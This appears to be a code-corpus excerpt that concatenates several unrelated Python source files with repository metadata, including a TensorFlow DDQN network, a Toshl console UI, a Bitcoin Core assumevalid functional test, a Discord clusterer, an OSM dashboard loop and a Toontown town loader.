def __init__(self, state_size, action_size, lr, name="DDQN"):
self.state_size = state_size
self.action_size = action_size
self.lr = lr
self.name = name
with tf.variable_scope(self.name):
# We create the placeholders
# *state_size means that we take each elements of state_size in tuple hence is like if we wrote
# [None, 100, 120, 4]
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
#
self.ISWeights_ = tf.placeholder(tf.float32, [None,1], name='IS_weights')
self.actions_ = tf.placeholder(tf.float32, [None, action_size], name="actions_")
# Remember that target_Q is the R(s,a) + ymax Qhat(s', a')
self.target_Q = tf.placeholder(tf.float32, [None], name="target")
"""
First convnet:
CNN
ELU
"""
# Input is 100x120x4
self.conv1 = tf.layers.conv2d(inputs = self.inputs_,
filters = 32,
kernel_size = [8,8],
strides = [4,4],
padding = "VALID",
kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
name = "conv1")
self.conv1_out = tf.nn.elu(self.conv1, name="conv1_out")
"""
Second convnet:
CNN
ELU
"""
self.conv2 = tf.layers.conv2d(inputs = self.conv1_out,
filters = 64,
kernel_size = [4,4],
strides = [2,2],
padding = "VALID",
kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
name = "conv2")
self.conv2_out = tf.nn.elu(self.conv2, name="conv2_out")
"""
Third convnet:
CNN
ELU
"""
self.conv3 = tf.layers.conv2d(inputs = self.conv2_out,
filters = 128,
kernel_size = [4,4],
strides = [2,2],
padding = "VALID",
kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
name = "conv3")
self.conv3_out = tf.nn.elu(self.conv3, name="conv3_out")
self.flatten = tf.layers.flatten(self.conv3_out)
self.value_fc = tf.layers.dense(inputs = self.flatten,
units = 512,
activation = tf.nn.elu,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="value_fc")
self.value = tf.layers.dense(inputs = self.value_fc,
units = 1,
activation = None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="value")
# Ccalculate A(s,a)
self.advantage_fc = tf.layers.dense(inputs = self.flatten,
units = 512,
activation = tf.nn.elu,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage_fc")
self.advantage = tf.layers.dense(inputs = self.advantage_fc,
units = self.action_size,
activation = None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantages")
# Agregating layer
# Q(s,a) = V(s) + (A(s,a) - 1/|A| * sum A(s,a'))
self.output = self.value + tf.subtract(self.advantage,
tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value.
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)
# The loss is modified because of PER
self.absolute_errors = tf.abs(self.target_Q - self.Q)
self.loss = tf.reduce_mean(
self.ISWeights_ * tf.squared_difference(self.target_Q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(
self.learning_rate).minimize(self.loss)
def predict_action(explore_start, explore_stop, decay_rate, decay_step, state, actions):
| 41.131148 | 107 | 0.454564 |
67e88eb40dccaf389bcedef1bc66c18c6e32cc5d | 3,035 | py | Python | toshl/SimpleConsoleUI.py | pabadrubio/toshl_sync | 40d7d3356b0e1be392091e1285de9cbb9a0c68a6 | [
"Apache-2.0"
] | null | null | null | toshl/SimpleConsoleUI.py | pabadrubio/toshl_sync | 40d7d3356b0e1be392091e1285de9cbb9a0c68a6 | [
"Apache-2.0"
] | null | null | null | toshl/SimpleConsoleUI.py | pabadrubio/toshl_sync | 40d7d3356b0e1be392091e1285de9cbb9a0c68a6 | [
"Apache-2.0"
] | null | null | null | # Pablo Abad 2017
#
# Toshl database program
class SimpleConsoleUI():
    """Console front-end for manually classifying bank entries.

    `io` must expose stdout/stdoutnnl/getString; `database` supplies the
    known categories/tags and can create new ones.
    """

    def __init__(self, io, database):
        self.io = io
        self.database = database

    def classifyManually(self, bankEntry):
        """Show a bank entry and interactively pick its category and tag.

        Returns (category, tag); ('', '') means "no category", and
        (None, None) means the user skipped the entry.
        """
        show = self.io.stdout
        show('-----------------------------------------------')
        show('Account: ' + bankEntry.account)
        show('Purpose: ' + bankEntry.purpose)
        show('Message: ' + bankEntry.message)
        show('Date   : ' + str(bankEntry.date))
        show('Amount : ' + str(bankEntry.amount))
        show('-----------------------------------------------')
        show('Choose a category:')
        category = self._choose_category_from_list(self.database.getCategories())
        if category is None or category == '':
            tag = ''
        else:
            show('Choose a tag:')
            tag = self._choose_tag_from_list(self.database.getTags(), category)
        if category is None or tag is None:
            return None, None
        return category, tag

    def askForOverwrite(self, toshlEntry):
        """Show the conflicting entry and ask whether to overwrite it."""
        show = self.io.stdout
        show('-----------------------------------------------')
        show('A similar entry was found:')
        toshlEntry.prettyPrint()
        show('-----------------------------------------------')
        answer = self.io.getString("Overwrite? (Enter yes to overwrite)")
        return answer == "yes"

    def _choose_from_list(self, elements, label, create_function):
        """Render a numbered menu and return the chosen element.

        Returns '' for "none", None for "skip", a freshly created name for
        G/I, otherwise the 1-based selection from `elements`.
        """
        total = len(elements)
        # Print the options four per row, truncating long names.
        for row_start in range(0, total, 4):
            for pos in range(row_start, min(total, row_start + 4)):
                text = elements[pos]
                if len(text) > 28:
                    text = text[:26] + '..'
                self.io.stdoutnnl('%2d. %-30s' % (pos + 1, text))
            self.io.stdout('')
        selection = self.io.getString("Please choose (E for skip, N for None, G to add a new expense type, I for a new Income type)")
        choice = selection.upper()
        if choice == "N":
            return ''
        if choice == "G":
            name = self.io.getString("Enter the name for the new expense " + label + ":")
            create_function(name, "expense")
            return name
        if choice == "I":
            name = self.io.getString("Enter the name for the new income " + label + ":")
            create_function(name, "income")
            return name
        if choice == "E":
            return None
        return elements[int(selection) - 1]

    def _choose_category_from_list(self, elements):
        return self._choose_from_list(
            elements, "category",
            lambda name, kind: self.database.addCategory(name, kind))

    def _choose_tag_from_list(self, elements, category):
        return self._choose_from_list(
            elements, "tag",
            lambda name, kind: self.database.addTag(name, kind, category))
| 41.013514 | 133 | 0.551895 |
f6e27834ba523d69a63dd13dd3dc4268cbe88b54 | 267 | py | Python | manage.py | valarpirai/HobbyProject | 072e75bdb9008788059f330f8fbaed6946a5ffad | [
"MIT"
] | 2 | 2017-06-04T10:25:59.000Z | 2020-08-07T09:05:10.000Z | manage.py | valarpirai/HobbyProject | 072e75bdb9008788059f330f8fbaed6946a5ffad | [
"MIT"
] | 2 | 2021-03-25T21:39:04.000Z | 2021-06-01T21:44:33.000Z | manage.py | valarpirai/HobbyProject | 072e75bdb9008788059f330f8fbaed6946a5ffad | [
"MIT"
] | null | null | null | from flask_script import Manager
from myapp import app
from flask_script import Server

manager = Manager(app.flask_app)


@manager.command
def hello():
    """Smoke-test command: `python manage.py hello`."""
    print("hello world")


# Register the development server as a *command object*. The original code
# passed `app.flask_app.run()`, which CALLED run() at import time — starting
# (and blocking on) the server immediately — instead of deferring it to the
# `runserver` command.
manager.add_command('runserver', Server())

if __name__ == "__main__":
    manager.run()
| 15.705882 | 53 | 0.715356 |
b7814bf33e5d4f7039478802591f6ae4e01ef09a | 7,628 | py | Python | test/functional/feature_assumevalid.py | joaquimsilva12/Q8bitcoin | 10b5901120a0ef369e403f761323680f1b61f1bc | [
"MIT"
] | 4 | 2019-07-29T15:20:16.000Z | 2020-04-10T16:42:18.000Z | test/functional/feature_assumevalid.py | ExodusMovement/bitcoin-magnifier | ce6762030f814bc737bb0a097c17201e0b2edbc5 | [
"MIT"
] | 13 | 2018-07-16T18:14:02.000Z | 2020-01-17T19:36:58.000Z | test/functional/feature_assumevalid.py | ExodusMovement/bitcoin-magnifier | ce6762030f814bc737bb0a097c17201e0b2edbc5 | [
"MIT"
] | 10 | 2019-05-23T03:15:07.000Z | 2021-12-04T13:32:05.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test logic for skipping signature validation on old blocks.
Test logic for skipping signature validation on blocks which we've assumed
valid (https://github.com/bitcoin/bitcoin/pull/9484)
We build a chain that includes and invalid signature for one of the
transactions:
0: genesis block
1: block 1 with coinbase transaction output.
2-101: bury that block with 100 blocks so the coinbase transaction
output can be spent
102: a block containing a transaction spending the coinbase
transaction output. The transaction has an invalid signature.
103-2202: bury the bad block with just over two weeks' worth of blocks
(2100 blocks)
Start three nodes:
- node0 has no -assumevalid parameter. Try to sync to block 2202. It will
reject block 102 and only sync as far as block 101
- node1 has -assumevalid set to the hash of block 102. Try to sync to
block 2202. node1 will sync all the way to block 2202.
- node2 has -assumevalid set to the hash of block 102. Try to sync to
block 200. node2 will reject block 102 since it's assumed valid, but it
isn't buried by at least two weeks' work.
"""
import time
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.key import ECKey
from test_framework.messages import (
CBlockHeader,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
msg_block,
msg_headers
)
from test_framework.mininode import P2PInterface
from test_framework.script import (CScript, OP_TRUE)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class BaseNode(P2PInterface):
    """Minimal P2P peer that can announce block headers to a node."""

    def send_header_for_blocks(self, new_blocks):
        # Bundle every block's header into a single headers message.
        announcement = msg_headers()
        announcement.headers = [CBlockHeader(blk) for blk in new_blocks]
        self.send_message(announcement)
class AssumeValidTest(BitcoinTestFramework):
    """Build a chain containing an invalid signature and check that
    -assumevalid skips (or does not skip) signature validation as expected
    on three differently-configured nodes."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 3

    def setup_network(self):
        self.add_nodes(3)
        # Start node0. We don't start the other nodes yet since
        # we need to pre-mine a block with an invalid transaction
        # signature so we can pass in the block hash as assumevalid.
        self.start_node(0)

    def send_blocks_until_disconnected(self, p2p_conn):
        """Keep sending blocks to the node until we're disconnected."""
        for i in range(len(self.blocks)):
            if not p2p_conn.is_connected:
                break
            try:
                p2p_conn.send_message(msg_block(self.blocks[i]))
            except IOError:
                # The node hung up on us mid-send; that is the expected exit.
                assert not p2p_conn.is_connected
                break

    def assert_blockchain_height(self, node, height):
        """Wait until the blockchain is no longer advancing and verify it's reached the expected height."""
        last_height = node.getblock(node.getbestblockhash())['height']
        timeout = 10
        while True:
            time.sleep(0.25)
            current_height = node.getblock(node.getbestblockhash())['height']
            if current_height != last_height:
                last_height = current_height
                if timeout < 0:
                    assert False, "blockchain too short after timeout: %d" % current_height
                # BUG FIX: the original wrote `timeout - 0.25`, an expression
                # whose result was discarded, so the timeout never counted
                # down and a slowly-advancing chain looped forever.
                timeout -= 0.25
                continue
            elif current_height > height:
                assert False, "blockchain too long: %d" % current_height
            elif current_height == height:
                break

    def run_test(self):
        p2p0 = self.nodes[0].add_p2p_connection(BaseNode())

        # Build the blockchain
        self.tip = int(self.nodes[0].getbestblockhash(), 16)
        self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
        self.blocks = []

        # Get a pubkey for the coinbase TXO
        coinbase_key = ECKey()
        coinbase_key.generate()
        coinbase_pubkey = coinbase_key.get_pubkey().get_bytes()

        # Create the first block with a coinbase output to our key
        height = 1
        block = create_block(self.tip, create_coinbase(height, coinbase_pubkey), self.block_time)
        self.blocks.append(block)
        self.block_time += 1
        block.solve()
        # Save the coinbase for later
        self.block1 = block
        self.tip = block.sha256
        height += 1

        # Bury the block 100 deep so the coinbase output is spendable
        for i in range(100):
            block = create_block(self.tip, create_coinbase(height), self.block_time)
            block.solve()
            self.blocks.append(block)
            self.tip = block.sha256
            self.block_time += 1
            height += 1

        # Create a transaction spending the coinbase output with an invalid (null) signature
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.block1.vtx[0].sha256, 0), scriptSig=b""))
        tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE])))
        tx.calc_sha256()

        block102 = create_block(self.tip, create_coinbase(height), self.block_time)
        self.block_time += 1
        block102.vtx.extend([tx])
        block102.hashMerkleRoot = block102.calc_merkle_root()
        block102.rehash()
        block102.solve()
        self.blocks.append(block102)
        self.tip = block102.sha256
        self.block_time += 1
        height += 1

        # Bury the assumed valid block 2100 deep
        for i in range(2100):
            block = create_block(self.tip, create_coinbase(height), self.block_time)
            block.nVersion = 4
            block.solve()
            self.blocks.append(block)
            self.tip = block.sha256
            self.block_time += 1
            height += 1

        self.nodes[0].disconnect_p2ps()

        # Start node1 and node2 with assumevalid so they accept a block with a bad signature.
        self.start_node(1, extra_args=["-assumevalid=" + hex(block102.sha256)])
        self.start_node(2, extra_args=["-assumevalid=" + hex(block102.sha256)])

        p2p0 = self.nodes[0].add_p2p_connection(BaseNode())
        p2p1 = self.nodes[1].add_p2p_connection(BaseNode())
        p2p2 = self.nodes[2].add_p2p_connection(BaseNode())

        # send header lists to all three nodes
        p2p0.send_header_for_blocks(self.blocks[0:2000])
        p2p0.send_header_for_blocks(self.blocks[2000:])
        p2p1.send_header_for_blocks(self.blocks[0:2000])
        p2p1.send_header_for_blocks(self.blocks[2000:])
        p2p2.send_header_for_blocks(self.blocks[0:200])

        # Send blocks to node0. Block 102 will be rejected.
        self.send_blocks_until_disconnected(p2p0)
        self.assert_blockchain_height(self.nodes[0], 101)

        # Send all blocks to node1. All blocks will be accepted.
        for i in range(2202):
            p2p1.send_message(msg_block(self.blocks[i]))
        # Syncing 2200 blocks can take a while on slow systems. Give it plenty of time to sync.
        p2p1.sync_with_ping(200)
        assert_equal(self.nodes[1].getblock(self.nodes[1].getbestblockhash())['height'], 2202)

        # Send blocks to node2. Block 102 will be rejected.
        self.send_blocks_until_disconnected(p2p2)
        self.assert_blockchain_height(self.nodes[2], 101)
# Standard functional-test entry point: build the test and hand control to
# the framework's main loop.
if __name__ == '__main__':
    AssumeValidTest().main()
| 39.729167 | 107 | 0.654955 |
9a6321cae097fcfd27c9fd5fcd87d22d024f1720 | 1,536 | py | Python | discord_notification_emailer/clusterer.py | csebra52/discord-notification-emailer | 5e58ec73b6230f9ec81dcbb75471a85c9cd5018a | [
"MIT"
] | 6 | 2019-05-04T01:31:37.000Z | 2021-07-28T15:44:41.000Z | discord_notification_emailer/clusterer.py | dylngg/discord_notification_emailer | 5e58ec73b6230f9ec81dcbb75471a85c9cd5018a | [
"MIT"
] | null | null | null | discord_notification_emailer/clusterer.py | dylngg/discord_notification_emailer | 5e58ec73b6230f9ec81dcbb75471a85c9cd5018a | [
"MIT"
] | 4 | 2021-02-20T20:58:45.000Z | 2021-10-30T12:56:35.000Z | import threading
import time
class ClusterManager():
    """Groups objects that arrive within a fixed window of time.

    The first object appended opens a window of `clustering_period`
    seconds; when the window closes, `callback` is invoked with the list
    of everything appended during the window, and the cluster resets.
    """

    def __init__(self, callback, clustering_period=10):
        # callback: receives the list of clustered objects when the
        # window closes. clustering_period: window length in seconds.
        self.callback = callback
        self.clustering_period = clustering_period
        self._clustering = False
        self._cluster = []

    def append(self, obj):
        """Add `obj` to the current cluster, opening a window if needed."""
        if not self._clustering:
            self._start_clustering()
        self._cluster.append(obj)

    def _start_clustering(self):
        """Arm the window timer on a background thread."""
        self._clustering = True
        timer = threading.Thread(target=self.end_cluster)
        timer.start()

    def end_cluster(self):
        """Sleep out the window, deliver the cluster, and reset state."""
        time.sleep(self.clustering_period)
        self.callback(self._cluster)
        self._cluster = []
        self._clustering = False
| 32.680851 | 78 | 0.647786 |
bb2935a317554ff71265555008b275a301e6f81b | 2,118 | py | Python | osm_mon/dashboarder/dashboarder.py | TCSOSM-20/MON | 06ad698093d4e39b199ba466617bf8cef6df5c42 | [
"Apache-2.0"
] | null | null | null | osm_mon/dashboarder/dashboarder.py | TCSOSM-20/MON | 06ad698093d4e39b199ba466617bf8cef6df5c42 | [
"Apache-2.0"
] | null | null | null | osm_mon/dashboarder/dashboarder.py | TCSOSM-20/MON | 06ad698093d4e39b199ba466617bf8cef6df5c42 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 Whitestack, LLC
# *************************************************************
# This file is part of OSM Monitoring module
# All Rights Reserved to Whitestack, LLC
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# For those usages not covered by the Apache License, Version 2.0 please
# contact: bdiaz@whitestack.com or glavado@whitestack.com
##
import logging
import time
import socket
import peewee
from osm_mon.dashboarder.service import DashboarderService
from osm_mon.core.config import Config
log = logging.getLogger(__name__)
class Dashboarder:
    """Periodic worker that provisions Grafana dashboards for OSM MON."""

    def __init__(self, config: Config):
        self.conf = config
        self.service = DashboarderService(config)

    def dashboard_forever(self):
        """Loop forever: wait for the Grafana backend, then (re)create
        dashboards every `dashboarder.interval` seconds."""
        log.debug('dashboard_forever')
        while True:
            # Probe DNS for the 'grafana' service host; if it is not
            # resolvable yet, wait one interval and retry.
            try:
                socket.gethostbyname("grafana")
                log.debug("Dashboard backend is running")
            except socket.error:
                log.debug("Dashboard backend is not available")
                time.sleep(int(self.conf.get('dashboarder', 'interval')))
                continue
            try:
                self.create_dashboards()
                # NOTE(review): the sleep sits *inside* the try block, so a
                # failing create_dashboards() skips it and retries
                # immediately — confirm this busy-retry is intentional.
                time.sleep(int(self.conf.get('dashboarder', 'interval')))
            except peewee.PeeweeException:
                # Database errors are considered fatal for this worker.
                log.exception("Database error consuming message: ")
                raise
            except Exception:
                # Any other failure is logged and the loop keeps going.
                log.exception("Error creating dashboards")

    def create_dashboards(self):
        # Delegate to the service layer, which talks to the backends.
        self.service.create_dashboards()
        log.debug('I just called the dashboarder service!')
| 34.721311 | 75 | 0.65203 |
865e74f18242e153831029a057dbcbaa47588039 | 246 | py | Python | keep_alive.py | Soulsender/scarabbot | 0c92834c65579912643b95d8aa37b23a6cf08602 | [
"MIT"
] | 6 | 2021-06-15T01:26:46.000Z | 2022-01-21T06:04:04.000Z | keep_alive.py | Soulsender/scarabbot | 0c92834c65579912643b95d8aa37b23a6cf08602 | [
"MIT"
] | 10 | 2021-06-15T20:35:52.000Z | 2022-02-07T03:04:43.000Z | keep_alive.py | Soulsender/scarabbot | 0c92834c65579912643b95d8aa37b23a6cf08602 | [
"MIT"
] | 1 | 2021-07-12T09:25:53.000Z | 2021-07-12T09:25:53.000Z | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot is online and pinging"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
| 15.375 | 38 | 0.642276 |
66f5ec2e08cf5874e13a23b85e84906eb4c3f528 | 1,254 | py | Python | libs/common.py | fangli/collector-fluentd | d96b7a9049a3e4bd0a73543f5cdab8b6b6d0b0f1 | [
"Apache-2.0"
] | 6 | 2015-01-27T04:31:45.000Z | 2020-05-11T08:58:54.000Z | libs/common.py | fangli/collector-fluentd | d96b7a9049a3e4bd0a73543f5cdab8b6b6d0b0f1 | [
"Apache-2.0"
] | null | null | null | libs/common.py | fangli/collector-fluentd | d96b7a9049a3e4bd0a73543f5cdab8b6b6d0b0f1 | [
"Apache-2.0"
] | 2 | 2017-03-02T09:02:15.000Z | 2020-05-11T08:59:21.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#*********************************************************#
# @@ScriptName: common.py
# @@Author: Felix Lee <surivlee@gmail.com>
# @@Create Date: 12/26/2012
# @@Modify Date: 2013-12-06 18:22:40
# @@Function:
#*********************************************************#
__author__ = "Felix Lee <surivlee@gmail.com>"
__version__ = (0, 1)
import time
import config as conf
def log(message, level=0):
    """Append a timestamped, level-tagged message to the collector log file.

    Args:
        message: text to log.
        level: -1 debug, 0 info, 1 warning, 2 critical; any other value is
            tagged [FATAL].

    The entry is written only when `level` is at or above the threshold
    named by conf.LOG_LEVEL (unknown names disable everything below FATAL).
    Logging is best-effort: write failures are swallowed so the collector
    never dies because of its own log file.
    """
    # Table lookups replace the two duplicated if/elif ladders.
    labels = {-1: '[DEBUG]', 0: '[INFO]', 1: '[WARNING]', 2: '[CRITICAL]'}
    sLevel = labels.get(level, '[FATAL]')
    thresholds = {'debug': -1, 'info': 0, 'warning': 1, 'critical': 2}
    level_defined = thresholds.get(conf.LOG_LEVEL.lower(), 3)
    if level >= level_defined:
        try:
            # 'with' guarantees the handle is closed even if the write fails.
            with open(conf.LOG_FILE, 'a') as f:
                f.write(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) + ' ' + sLevel + ' ' + message + '\n')
        except Exception:
            # The original used a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; Exception keeps the best-effort
            # intent without masking interpreter exits.
            pass
5bf3953ace7029c44ceccbd62e49334a892dca03 | 16,453 | py | Python | toontown/town/TownLoader.py | TopDeveloper-333/opentoontownsrc | b2d956d1a40f5e3d40fa33a9f01862137e018347 | [
"BSD-3-Clause"
] | null | null | null | toontown/town/TownLoader.py | TopDeveloper-333/opentoontownsrc | b2d956d1a40f5e3d40fa33a9f01862137e018347 | [
"BSD-3-Clause"
] | null | null | null | toontown/town/TownLoader.py | TopDeveloper-333/opentoontownsrc | b2d956d1a40f5e3d40fa33a9f01862137e018347 | [
"BSD-3-Clause"
] | null | null | null | from pandac.PandaModules import *
from toontown.battle.BattleProps import *
from toontown.battle.BattleSounds import *
from toontown.distributed.ToontownMsgTypes import *
from toontown.toonbase.ToontownGlobals import *
from direct.gui.DirectGui import cleanupDialog
from direct.directnotify import DirectNotifyGlobal
from toontown.hood import Place
from direct.showbase import DirectObject
from direct.fsm import StateData
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.task import Task
import TownBattle
from toontown.toon import Toon
from toontown.toon.Toon import teleportDebug
from toontown.battle import BattleParticles
from direct.fsm import StateData
from toontown.building import ToonInterior
from toontown.hood import QuietZoneState
from toontown.hood import ZoneUtil
from direct.interval.IntervalGlobal import *
class TownLoader(StateData.StateData):
    """Base loader for a town (street) area.

    Owns the FSM that moves the local toon between streets, toon interiors
    and quiet zones, and loads the shared town assets (music, battle
    animations, DNA geometry). Concrete subclasses supply musicFile,
    activityMusicFile, townStorageDNAFile and streetClass (referenced in
    load()/createHood()/enterStreet()).
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('TownLoader')

    def __init__(self, hood, parentFSMState, doneEvent):
        # hood: owning hood object; parentFSMState: FSM state this loader's
        # FSM hangs under; doneEvent: messenger event fired when done.
        StateData.StateData.__init__(self, doneEvent)
        self.hood = hood
        self.parentFSMState = parentFSMState
        # States: start -> (street | toonInterior | quietZone) -> final;
        # quietZone mediates transitions between streets and interiors.
        self.fsm = ClassicFSM.ClassicFSM('TownLoader', [State.State('start', self.enterStart, self.exitStart, ['quietZone', 'street', 'toonInterior']),
         State.State('street', self.enterStreet, self.exitStreet, ['quietZone']),
         State.State('toonInterior', self.enterToonInterior, self.exitToonInterior, ['quietZone']),
         State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['street', 'toonInterior']),
         State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
        self.branchZone = None
        self.canonicalBranchZone = None
        # Event names used to hand control back from places/battles.
        self.placeDoneEvent = 'placeDone'
        self.townBattleDoneEvent = 'town-battle-done'
        return
    def loadBattleAnims(self):
        # Battle animations are shared globally across all toons.
        Toon.loadBattleAnims()

    def unloadBattleAnims(self):
        Toon.unloadBattleAnims()

    def load(self, zoneId):
        """Load town-wide resources for the given zone."""
        self.zoneId = zoneId
        self.parentFSMState.addChild(self.fsm)
        self.loadBattleAnims()
        self.branchZone = ZoneUtil.getBranchZone(zoneId)
        self.canonicalBranchZone = ZoneUtil.getCanonicalBranchZone(zoneId)
        # musicFile/activityMusicFile are provided by the concrete subclass.
        self.music = base.loader.loadMusic(self.musicFile)
        self.activityMusic = base.loader.loadMusic(self.activityMusicFile)
        self.battleMusic = base.loader.loadMusic('phase_3.5/audio/bgm/encntr_general_bg.mid')
        self.townBattle = TownBattle.TownBattle(self.townBattleDoneEvent)
        self.townBattle.load()
    def unload(self):
        """Tear down everything load()/createHood() built.

        Order matters: shared caches first, then the FSM, then scene graph
        nodes, then per-loader resources, and finally pool garbage
        collection.
        """
        self.unloadBattleAnims()
        # Flush shared battle caches.
        globalPropPool.unloadProps()
        globalBattleSoundCache.clear()
        BattleParticles.unloadParticles()
        # Detach and drop the FSM.
        self.parentFSMState.removeChild(self.fsm)
        del self.parentFSMState
        del self.fsm
        del self.streetClass
        self.landmarkBlocks.removeNode()
        del self.landmarkBlocks
        self.hood.dnaStore.resetSuitPoints()
        self.hood.dnaStore.resetBattleCells()
        del self.hood
        # Drop the vis-group bookkeeping built by makeDictionaries().
        del self.nodeDict
        del self.zoneDict
        if base.cr.astronSupport:
            del self.node2zone
        del self.fadeInDict
        del self.fadeOutDict
        del self.nodeList
        self.geom.removeNode()
        del self.geom
        self.townBattle.unload()
        self.townBattle.cleanup()
        del self.townBattle
        del self.battleMusic
        del self.music
        del self.activityMusic
        del self.holidayPropTransforms
        self.deleteAnimatedProps()
        cleanupDialog('globalDialog')
        # Reclaim model/texture memory now that nothing references it.
        ModelPool.garbageCollect()
        TexturePool.garbageCollect()
    def enter(self, requestStatus):
        """Activate the loader, starting in requestStatus['where']."""
        teleportDebug(requestStatus, 'TownLoader.enter(%s)' % requestStatus)
        self.fsm.enterInitialState()
        teleportDebug(requestStatus, 'setting state: %s' % requestStatus['where'])
        self.setState(requestStatus['where'], requestStatus)

    def exit(self):
        # Drop every messenger hook this loader registered.
        self.ignoreAll()

    def setState(self, stateName, requestStatus):
        self.fsm.request(stateName, [requestStatus])

    def enterStart(self):
        pass

    def exitStart(self):
        pass
    def enterStreet(self, requestStatus):
        """Create and enter the subclass-specific street Place."""
        teleportDebug(requestStatus, 'enterStreet(%s)' % requestStatus)
        self.acceptOnce(self.placeDoneEvent, self.streetDone)
        # streetClass is supplied by the concrete town loader subclass.
        self.place = self.streetClass(self, self.fsm, self.placeDoneEvent)
        self.place.load()
        base.cr.playGame.setPlace(self.place)
        self.place.enter(requestStatus)

    def exitStreet(self):
        self.place.exit()
        self.place.unload()
        self.place = None
        base.cr.playGame.setPlace(self.place)
        return

    def streetDone(self):
        """Decide where to go when the street Place finishes."""
        self.requestStatus = self.place.doneStatus
        status = self.place.doneStatus
        # Staying on this street branch and shard: route through the quiet
        # zone; otherwise bubble the request up to our owner.
        if status['loader'] == 'townLoader' and ZoneUtil.getBranchZone(status['zoneId']) == self.branchZone and status['shardId'] == None:
            self.fsm.request('quietZone', [status])
        else:
            self.doneStatus = status
            messenger.send(self.doneEvent)
        return
    def enterToonInterior(self, requestStatus):
        """Enter a toon building interior Place."""
        self.acceptOnce(self.placeDoneEvent, self.handleToonInteriorDone)
        self.place = ToonInterior.ToonInterior(self, self.fsm.getStateNamed('toonInterior'), self.placeDoneEvent)
        base.cr.playGame.setPlace(self.place)
        self.place.load()
        self.place.enter(requestStatus)

    def exitToonInterior(self):
        self.ignore(self.placeDoneEvent)
        self.place.exit()
        self.place.unload()
        self.place = None
        base.cr.playGame.setPlace(self.place)
        return

    def handleToonInteriorDone(self):
        """Route the interior's done status, mirroring streetDone()."""
        status = self.place.doneStatus
        if ZoneUtil.getBranchZone(status['zoneId']) == self.branchZone and status['shardId'] == None:
            self.fsm.request('quietZone', [status])
        else:
            self.doneStatus = status
            messenger.send(self.doneEvent)
        return
    def enterQuietZone(self, requestStatus):
        """Enter the transitional quiet zone between two places."""
        self.quietZoneDoneEvent = uniqueName('quietZoneDone')
        self.acceptOnce(self.quietZoneDoneEvent, self.handleQuietZoneDone)
        self.quietZoneStateData = QuietZoneState.QuietZoneState(self.quietZoneDoneEvent)
        self.quietZoneStateData.load()
        self.quietZoneStateData.enter(requestStatus)

    def exitQuietZone(self):
        self.ignore(self.quietZoneDoneEvent)
        del self.quietZoneDoneEvent
        self.quietZoneStateData.exit()
        self.quietZoneStateData.unload()
        self.quietZoneStateData = None
        return

    def handleQuietZoneDone(self):
        # Continue to whatever state the quiet zone resolved to.
        status = self.quietZoneStateData.getRequestStatus()
        self.fsm.request(status['where'], [status])

    def enterFinal(self):
        pass

    def exitFinal(self):
        pass
    def createHood(self, dnaFile, loadStorage = 1):
        """Load the town's DNA geometry and build all derived structures.

        Args:
            dnaFile: the street DNA file to instantiate.
            loadStorage: when true, also load the shared and per-town
                storage DNA into the hood's dnaStore first.
        """
        if loadStorage:
            loader.loadDNAFile(self.hood.dnaStore, 'phase_5/dna/storage_town.dna')
            self.notify.debug('done loading %s' % 'phase_5/dna/storage_town.dna')
            loader.loadDNAFile(self.hood.dnaStore, self.townStorageDNAFile)
            self.notify.debug('done loading %s' % self.townStorageDNAFile)
        node = loader.loadDNAFile(self.hood.dnaStore, dnaFile)
        self.notify.debug('done loading %s' % dnaFile)
        # Parent the generated geometry under hidden until enter() shows it.
        if node.getNumParents() == 1:
            self.geom = NodePath(node.getParent(0))
            self.geom.reparentTo(hidden)
        else:
            self.geom = hidden.attachNewNode(node)
        self.makeDictionaries(self.hood.dnaStore)
        self.reparentLandmarkBlockNodes()
        self.renameFloorPolys(self.nodeList)
        self.createAnimatedProps(self.nodeList)
        # Record each holiday prop's net transform, keyed by an index
        # stored on the node itself (backquotes = Python 2 repr()).
        self.holidayPropTransforms = {}
        npl = self.geom.findAllMatches('**/=DNARoot=holiday_prop')
        for i in range(npl.getNumPaths()):
            np = npl.getPath(i)
            np.setTag('transformIndex', `i`)
            self.holidayPropTransforms[i] = np.getNetTransform()
        self.notify.info('skipping self.geom.flattenMedium')
        # Pre-upload the scene to the graphics state guardian if we have one.
        gsg = base.win.getGsg()
        if gsg:
            self.geom.prepareScene(gsg)
